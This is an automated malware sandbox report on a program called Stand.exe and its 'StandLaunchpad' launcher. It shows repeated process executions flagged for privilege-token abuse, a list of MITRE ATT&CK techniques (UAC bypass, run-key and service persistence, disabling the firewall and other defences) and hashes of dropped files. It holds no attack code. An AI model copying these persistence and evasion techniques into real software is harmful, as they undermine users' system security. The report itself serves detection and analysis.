C:\Users\Admin\AppData\Local\Temp\Stand.exeC:\Users\Admin\AppData\Local\Temp\Stand.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2816
-
C:\Users\Admin\AppData\Local\Temp\Stand.exeC:\Users\Admin\AppData\Local\Temp\Stand.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3280
-
C:\Users\Admin\AppData\Local\Temp\Stand.exeC:\Users\Admin\AppData\Local\Temp\Stand.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:728
-
C:\Users\Admin\AppData\Local\Temp\Stand.exeC:\Users\Admin\AppData\Local\Temp\Stand.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2408
-
C:\Users\Admin\AppData\Local\Temp\Stand.exeC:\Users\Admin\AppData\Local\Temp\Stand.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1740
-
C:\Users\Admin\AppData\Local\Temp\Stand.exeC:\Users\Admin\AppData\Local\Temp\Stand.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2788
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault56c02763h20c9h4243hb0c4h75da5559e69a1⤵
- Suspicious use of WriteProcessMemory
PID:3676 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ff9dc3746f8,0x7ff9dc374708,0x7ff9dc3747182⤵PID:2640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1988,1223269892194788198,11112823150739072116,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2004 /prefetch:22⤵PID:540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1988,1223269892194788198,11112823150739072116,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2464 /prefetch:32⤵PID:2856
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1988,1223269892194788198,11112823150739072116,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2732 /prefetch:82⤵PID:3496
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1924
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4952
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4448
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:860
-
C:\Users\Admin\AppData\Local\Temp\Stand.exeC:\Users\Admin\AppData\Local\Temp\Stand.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2036
-
C:\Users\Admin\AppData\Local\Temp\Stand.exeC:\Users\Admin\AppData\Local\Temp\Stand.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5044
-
C:\Users\Admin\AppData\Local\Temp\Stand.exeC:\Users\Admin\AppData\Local\Temp\Stand.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4488
-
C:\Users\Admin\AppData\Local\Temp\Stand.exeC:\Users\Admin\AppData\Local\Temp\Stand.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4116
-
C:\Users\Admin\AppData\Local\Temp\Stand.exeC:\Users\Admin\AppData\Local\Temp\Stand.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:236
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4a8 0x50c1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4920
-
C:\Users\Admin\AppData\Local\Temp\Stand.exeC:\Users\Admin\AppData\Local\Temp\Stand.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4396
-
C:\Users\Admin\AppData\Local\Temp\Stand.exeC:\Users\Admin\AppData\Local\Temp\Stand.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3924
-
C:\Users\Admin\AppData\Local\Temp\Stand.exeC:\Users\Admin\AppData\Local\Temp\Stand.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3900
Network
MITRE ATT&CK Enterprise v15
Persistence
BITS Jobs
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1BITS Jobs
1Impair Defenses
3Disable or Modify System Firewall
1Disable or Modify Tools
1Modify Registry
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
9.1MB
MD564261d5f3b07671f15b7f10f2f78da3f
SHA1d4f978177394024bb4d0e5b6b972a5f72f830181
SHA25687f51b4632c5fbc351a59a234dfefef506d807f2c173aac23162b85d0d73c2ad
SHA5123a9ff39e6bc7585b0b03f7327652e4c3b766563e8b183c25b6497e30956945add5684f1579862117e44c6bac2802601fc7c4d2a0daa1824f16c4da1fd6c9c91a
-
Filesize
56KB
MD5b635f6f767e485c7e17833411d567712
SHA15a9cbdca7794aae308c44edfa7a1ff5b155e4aa8
SHA2566838286fb88e9e4e68882601a13fa770f1b510a0a86389b6a29070a129bf2e5e
SHA512551ba05bd44e66685f359802b35a8c9775792a12844906b4b53e1a000d56624c6db323754331c9f399072790991c1b256d9114a50fb78111652a1c973d2880af
-
C:\Users\Admin\AppData\Local\Calamity,_Inc\StandLaunchpad.exe_Url_0ogkziflfqqqnk55k4gkugnao5icma5g\1.9.0.0\user.config
Filesize946B
MD5b4ae24f20e59e454d57443d663a7581e
SHA168ab33e7fcea8bf79d76728fc49338d0d10a12f6
SHA2568409dd0aa292b3bf50903a7ca1a1a0d6697d5c7b0ed3d1c5e43ebdf6f82db074
SHA51225a7cbc382609d298ecaedea567231ac6ba0856bc523550912fd7b8393a29664ad68e9490dff0ff25b18b7a018476798c4df1000ebc99174bb6f2d5604e383f5
-
C:\Users\Admin\AppData\Local\Calamity,_Inc\StandLaunchpad.exe_Url_0ogkziflfqqqnk55k4gkugnao5icma5g\1.9.0.0\user.config
Filesize1KB
MD54914bef93f236a5cb24b4c07e9d4a98a
SHA1b53f8fb945a449dd8a76d4412c5439b29b929b9e
SHA2560abb6c072277956c8e3d6810dc9d9795544098f46a1fc79ab2e39c3f70d84a5a
SHA5123242dbf1f58263ab1409d558b5ba1846e235da17246f1abbab768ec1ed449367e30c6d17d4986aa117c42ea225e87ff2c438d46765f1b5841e3a5b9b571ccb10
-
Filesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
152B
MD5e0811105475d528ab174dfdb69f935f3
SHA1dd9689f0f70a07b4e6fb29607e42d2d5faf1f516
SHA256c91388c87878a9e2c530c6096dbdd993b0a26fefe8ad797e0133547225032d6c
SHA5128374a721ea3ff3a1ea70d8a074e5c193dbba27ba7e301f19cea89d648b2378c376e48310c33fe81078cd40b1863daec935e8ac22e8e3878dc3a5bb529d028852
-
Filesize
152B
MD547b2c6613360b818825d076d14c051f7
SHA17df7304568313a06540f490bf3305cb89bc03e5c
SHA25647a22bea2e7d0154c59bf5d8790ec68274eb05e9fa6cf0eab0d648121f1a02ac
SHA51208d2366fc1ce87dbe96b9bf997e4c59c9206fcfea47c1f17b01e79aeb0580f25cac5c7349bb453a50775b2743053446653f4129f835f81f4a8547ca392557aac
-
Filesize
152B
MD5ba6e143426fef24826d8ab66ff22f3b1
SHA14cc16318d41e7e977232bd1494813252be0966ba
SHA256520113c04ffb9d5799825d92d102908344c2756dd5887d858b2e82cc19746489
SHA512a4e4226f1ce3f546e1fac6d47cee76a6bf5b6222a67d21378a8c15aab108485e611faa2af569217be2ed1d4a0b88585ae55c1ac6608bcc03c59fb748961bc424
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize72B
MD549dbbc4ae193774a0726fa6873f9736f
SHA1d56a83c93bd80d44bbf8c9f0708204b53c1adefd
SHA25687b1e668d8f5fde0a6768e36199e60ae8ea794326b337aba29935bbe990dc0e6
SHA512c41dcd4136df8876c7b3aff2890806101318596482ba4d1881e5f623e96f0a700be19ef753387acfc293dc9c42727c5b8ca9d7a5347ee69746c15084f1d365d5
-
Filesize
331B
MD50feb069b0950e25aae1a98402f245f63
SHA1b696e174e86e19aa35a0a70d94f5b073c39b1c32
SHA2565402a92c4cd5857bd3c446ceb5c8f979f96bba072d84e8d6de697c605d9c57b2
SHA512df650902502c5c1bfa7da64e40fe1dfc0d75631b6effa4829bf27d182c6bae601fd7b19fcf223acaa95cb6464ff86939059f123939184a458d4b60e22f2eaf5e
-
Filesize
255B
MD5dcc414d85747daf04be99ed09b10f335
SHA14a2079585a544e3e388dfef0c1e7c92058efa8f2
SHA256fbcb396bca60bab9bc65a21b41bbf5e9dd7f371c1b91565a740238fdaedd45bd
SHA5120b43c32dd92d1d71a5dad91679462d60a18bb6d856e59b96b5c89178ac62dac1dd9c373b38f21b271cea0c3bb102039e0ffd639c877dc4666ebfc89a21a34931
-
Filesize
6KB
MD5b11268f530a212fe5e37699d383b77f0
SHA14e58bf7e1c0527dbba05b69dedcbea5349b30ae7
SHA2568a89be5bb51473780d7b31e99d64f9243bd70711a2d17248073d3ab04ecfd95a
SHA51238fa019b2251ad9d531b7e959cec700fef0eb3609831c0013f26f7da18b479eb49a544d666265da52ad310bd7ee9a6673118e09b1fddb8a30668b265157bddd0
-
Filesize
5KB
MD5abdca409c886615875f36b9de39cba88
SHA19aad7b2a86227e7246fda976dd0642c28a418168
SHA256154dd4ce5a9ecab823c7c073dfbb873ffd53ae13ca29decff75f4d1d8a8eb3e3
SHA512b3a408abf54691da624f01f2d068e26e4295e60f64abae88cca693d90c882df428af6e519a0410d8d71379ce4a78f80611f07d7ebf8de195b5339e289a21cd3f
-
Filesize
6KB
MD50ce6cde09010e4140d068b36635f2ada
SHA158a93359596061731688a26def837f32e341e6f7
SHA2566bc354657e41a176415cf51da58ef08e31808ed527a5551cd4b287d82048d2cf
SHA512245a70c29e7d2c92d6241c6bd054a06323c33ce6a6f453411f5aaf8b4f4ea7d1a5401c4ca12f6b8eb96dab74460ec84b5cd60ee9a605747cd6d303020f08100a
-
Filesize
6KB
MD5dd94fc70d488fa035903b01fdc58d83c
SHA1dc0f0d9a5d5e819939a4c1ec02aaaa24e685035e
SHA25615d36d4fcd3dc0799bace197f83a11586355fc4d1b96a1004cb51478892bfc59
SHA512bb7149fd863a56e6dfab8f2752147473f08ebde7895d816d4b78edbc05f51f0302fdd801e85f33fd8849a24d76607f7db161d977781f87714ef2cceae3c13b64
-
Filesize
6KB
MD5201bc6d9db0870568c4740010389646b
SHA1740c652ea377e02cce0fc050e4914df64444a6a4
SHA2565f2249a931f5375d4974aed22060e5335457ae6ebfac9ddbe72bf1e7e0c6f4ec
SHA5120b0db455e4ff15797560bd946c6e63fa9b5def775723b9be44cbeacad818dad5777274492c561b9362454e17f68e37253e2538a00ce7a87b5e6e994e6dd4c651
-
Filesize
344B
MD5b8a119e8bcc12bf6568e2a29d570fec9
SHA10725bf8d134deeca3b63b04e3176c5a3daa0bbdb
SHA256b4b81adc8ba10100d189d57c13ecaa734e66526246ca23df15e1c296cf298394
SHA51285961ba798bc53d2ae514e178e8d69503d2bae9133da0fb77ec39892f678e473cf4ac817465ab4e53bb19136603c7bde251a92afee2c7260f7483561a9b7a09d
-
Filesize
326B
MD59e57f9dc6de67f0c9048147742411b5a
SHA1bea9a9ba2be3ade918b34d2d73a288684dc69551
SHA256cd971f2b81e09865080ca25c5f7021b2e9904997e9eaff9ba9fb0fb29615721b
SHA512739ee11986900e570bd8c1dcdce6cac8744bebc9791af8c0f94cf10e4d22151c546a83cce369f758d04a4787e0eecfe6ca144f03611554e568283e110548b0f2
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
11B
MD5838a7b32aefb618130392bc7d006aa2e
SHA15159e0f18c9e68f0e75e2239875aa994847b8290
SHA256ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa
SHA5129e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9
-
Filesize
8KB
MD57e8e909253162cb36ef0411aed9a8fd0
SHA1bb3f70c2f7c4cea5facd14265775aa42d8f7c905
SHA25602c8f09f0bef88f32b58ddfebf334325073c12fccccc5d877c38a6554370a415
SHA512ec24a5f89ac8a1ea98179f6f73af7464bdf00611bf2916d10352df7c39f07612c616050f2efcf5e7592355743b5e335ef0e061249ea6cab902dfbc1dcd71e014
-
Filesize
11KB
MD502829817f5b1b6a7c26487d2bc59eec2
SHA1231a10b835c2e0e53e91e922d115552914a5be0e
SHA25612fa9253ceaf38fee7826e33091782855321e6ed109c22e67f9d6dbe569b6325
SHA5120624330bd0537682ee83068d161c5c085226f68e530079c1b609391dcd3a7028e15b5f29c25b44e12313154721ce568eba9e1bbe8c40db8fdffe86621df35ff7
-
Filesize
12KB
MD5500daa74403d62c41e83a70e0679001b
SHA1178a97cc4897305f6e9774edf085b3b88cc61af1
SHA2563a68949931a452c5ba2346ab22206ebae70fd022a2d9d3628d847330a2a803e8
SHA5124abe0c53cf5c6c317a58225ae9b8b3895a4d88f5577a6ef4e5fa1cba3cf858b0f2e5c205aa6b9ad38ca24c1cd9dec5a26dcd1b7b899246ce838e140ab1f8d06d
-
Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
Filesize
64KB
MD5987a07b978cfe12e4ce45e513ef86619
SHA122eec9a9b2e83ad33bedc59e3205f86590b7d40c
SHA256f1a4a978ce1c4731df1594043135cf58d084fdf129dd1c8e4507c9e06eac5ea8
SHA51239b86540e4d35c84609ef66537b5aa02058e3d4293f902127c7d4eac8ffc65920cb5c69a77552fc085687eed66e38367f83c177046d0ecb8e6d135463cc142aa
-
Filesize
9KB
MD57050d5ae8acfbe560fa11073fef8185d
SHA15bc38e77ff06785fe0aec5a345c4ccd15752560e
SHA256cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b
SHA512a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b
-
Filesize
944B
MD52e907f77659a6601fcc408274894da2e
SHA19f5b72abef1cd7145bf37547cdb1b9254b4efe9d
SHA256385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233
SHA51234fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721
-
Filesize
944B
MD58ab6456a8ec71255cb9ead0bb5d27767
SHA1bc9ff860086488478e7716f7ac4421e8f69795fb
SHA256bcb14f15fbe23bf51a657c69b24f09cd51e33a2530f89ad17c44f660769611e2
SHA51287c5368dbd7c85f341edf8992d8b1c87984f9a3549a4802c6054da4e12a8674f10f56d03afc1a72b2cfc40895150d3b0f4d9d4c355c79cdf364ace35eb8ebf15
-
Filesize
944B
MD5f41f42c322498af0591f396c59dd4304
SHA1e1e5aa68d73d48bc5e743a34f6c0fa8960ff7514
SHA256d8bd9a4a363ff2ac2dc887759ec6ba4215a4ce0925a8fb9c531573458ee4a31c
SHA5122328a1b402b4fb0de9c451fb630eab58549129d3bcfb70b9834cfbd16065ebaadec006b309ea17ac182d34c53e01705cbc9e0196eb0cbd62600c866e79a1844f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
146KB
MD5eec4daa80c23ffd8b6d7667280ebc4d8
SHA1d0e460c9549cf5363cfb1b70458a0b4124d9f21b
SHA25669cdf15d966c292361f08d311d18daaab5ff154b67b476534ee7dc8d14d6e93a
SHA512a4f3e91cbef4052adb7b4889cfb62b93754e2e32e897a3ba8660a6b5adbf25797731b7f46015ff26fdcd42bae2b266d21f64b09a93c09d45945c262f0938f575
-
Filesize
3.6MB
MD5698ddcaec1edcf1245807627884edf9c
SHA1c7fcbeaa2aadffaf807c096c51fb14c47003ac20
SHA256cde975f975d21edb2e5faa505205ab8a2c5a565ba1ff8585d1f0e372b2a1d78b
SHA512a2c326f0c653edcd613a3cefc8d82006e843e69afc787c870aa1b9686a20d79e5ab4e9e60b04d1970f07d88318588c1305117810e73ac620afd1fb6511394155
-
Filesize
68KB
MD5bc1e7d033a999c4fd006109c24599f4d
SHA1b927f0fc4a4232a023312198b33272e1a6d79cec
SHA25613adae722719839af8102f98730f3af1c5a56b58069bfce8995acd2123628401
SHA512f5d9b8c1fd9239894ec9c075542bff0bcef79871f31038e627ae257b8c1db9070f4d124448a78e60ccc8bc12f138102a54825e9d7647cd34832984c7c24a6276
-
Filesize
122KB
MD5d043ba91e42e0d9a68c9866f002e8a21
SHA1e9f177e1c57db0a15d1dc6b3e6c866d38d85b17c
SHA2566820c71df417e434c5ad26438c901c780fc5a80b28a466821b47d20b8424ef08
SHA5123e9783646e652e9482b3e7648fb0a5f7c8b6c386bbc373d5670d750f6f99f6137b5501e21332411609cbcc0c20f829ab8705c2835e2756455f6754c9975ac6bd
-
Filesize
1.1MB
MD5f0a661d33aac3a3ce0c38c89bec52f89
SHA1709d6465793675208f22f779f9e070ed31d81e61
SHA256c20e78ce9028299d566684d35b1230d055e5ea0e9b94d0aff58f650e0468778a
SHA51257cdb3c38f2e90d03e6dc1f9d8d1131d40d3919f390bb1783343c82465461319e70483dc3cd3efdbd9a62dfc88d74fc706f05d760ffd8506b16fd7686e414443
-
Filesize
3KB
MD56f5767ec5a9cc6f7d195dde3c3939120
SHA14605a2d0aae8fa5ec0b72973bea928762cc6d002
SHA25659fe169797953f2046b283235fe80158ebf02ba586eabfea306402fba8473dae
SHA512c0fbba6ecaef82d04157c5fcf458817bf11ce29cdaf3af6cac56724efcf4305565c6e665cdcf2106c675ba0574c60606be81d9baafe804fc7d2d3a50fed0baf6
-
Filesize
197KB
MD57506eb94c661522aff09a5c96d6f182b
SHA1329bbdb1f877942d55b53b1d48db56a458eb2310
SHA256d5b962dfe37671b5134f0b741a662610b568c2b5374010ee92b5b7857d87872c
SHA512d815a9391ef3d508b89fc221506b95f4c92d586ec38f26aec0f239750f34cf398eed3d818fa439f6aa6ed3b30f555a1903d93eeeec133b80849a4aa6685ec070
-
Filesize
84KB
MD5b6e148ee1a2a3b460dd2a0adbf1dd39c
SHA1ec0efbe8fd2fa5300164e9e4eded0d40da549c60
SHA256dc31e710277eac1b125de6f4626765a2684d992147691a33964e368e5f269cba
SHA5124b8c62ddfc7cd3e5ce1f8b5a1ba4a611ab1bfccf81d80cf2cfc831cffa1d7a4b6da0494616a53b419168bc3a324b57382d4a6186af083de6fc93d144c4503741
-
Filesize
248KB
MD520d2c71d6d9daf4499ffc4a5d164f1c3
SHA138e5dcd93f25386d05a34a5b26d3fba1bf02f7c8
SHA2563ac8cc58dcbceaec3dab046aea050357e0e2248d30b0804c738c9a5b037c220d
SHA5128ffd56fb3538eb60da2dde9e3d6eee0dac8419c61532e9127f47c4351b6e53e01143af92b2e26b521e23cdbbf15d7a358d3757431e572e37a1eede57c7d39704
-
Filesize
22.8MB
MD5debbb809161c3740e923476d2934a35c
SHA13f9e3cf382a96c6b5a6e9420ce671336f607888b
SHA256daf5a49963035f2161f15e0a4b91fde7893a62a35ea255d8b429420907fb7212
SHA5125f8f5cb29af9b4952cc6348fa3decf7a7c94a132bf827f55bd9bc230c6920bee4c89b385c39b33b1807c8a25f813c730b3aee8e53616fff50eb1cb90df2cedf5
-
Filesize
5KB
MD5fe537a3346590c04d81d357e3c4be6e8
SHA1b1285f1d8618292e17e490857d1bdf0a79104837
SHA256bbc572cced7c94d63a7208f4aba4ed20d1350bef153b099035a86c95c8d96d4a
SHA51250a5c1ad99ee9f3a540cb30e87ebfdf7561f0a0ee35b3d06c394fa2bad06ca6088a04848ddcb25f449b3c98b89a91d1ba5859f1ed6737119b606968be250c8ce
-
Filesize
4.4MB
MD56a4853cd0584dc90067e15afb43c4962
SHA1ae59bbb123e98dc8379d08887f83d7e52b1b47fc
SHA256ccb9502bf8ba5becf8b758ca04a5625c30b79e2d10d2677cc43ae4253e1288ec
SHA512feb223e0de9bd64e32dc4f3227e175b58196b5e614bca8c2df0bbca2442a564e39d66bcd465154149dc7ebbd3e1ca644ed09d9a9174b52236c76e7388cb9d996
-
Filesize
902B
MD5ebd443575858c52e16ec6f0cf6259925
SHA1497058b1f7f31a015fee8b857b1449d492625fcc
SHA256d9b644f72c25f9713f24acfcd32ee6ef6ea57d9dcfefce49d6acc848cf768dd6
SHA5123ae733da0ec4b2b841f3851e1c9a2c361728370681fef7b7e0a5e53f79725a171c8402719b7a87248693f0a61080cf110ff3f34a868aedd85c5a425400eb85ad
-
Filesize
97KB
MD530616682898f5d130d7d93f4d78c002d
SHA1f803aebd10386f6fb5790ed015dabbfd409d8c10
SHA25686feff5f4e9a433b3a7d95ba65bf370e56655a9b197ab9aef059ae8a606ec2cf
SHA51240a950e3866b4017acb66c5566eb70f9763d7079ac79c22c5a99a7b02a8833e73f31872c746938325e503050ee03185014efa2e675f6b6900397226c8194a80c